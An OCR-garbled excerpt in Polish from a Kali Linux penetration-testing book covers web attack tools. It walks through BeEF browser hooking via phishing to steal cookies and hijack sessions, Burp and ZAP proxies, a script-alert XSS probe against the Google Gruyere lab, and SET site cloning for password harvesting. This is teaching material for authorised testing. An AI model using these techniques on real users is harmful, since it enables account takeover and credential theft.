Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319

Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323

Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327

Podsumowanie 327

Skorowidz 329

Kup książkę Poleć książkę

Spis tre ci

8

Kup książkę Poleć książkę

6

Ataki na aplikacjeinternetowe

i serwery WWW

W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-

ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew

Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

232

systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS

BeEF mdash Browser Exploitation Framework

Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych

Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox

Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux

Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

233

apt-get updateapt-get install beef-xss

Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF

Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku

Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew

Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

234

W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef

Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

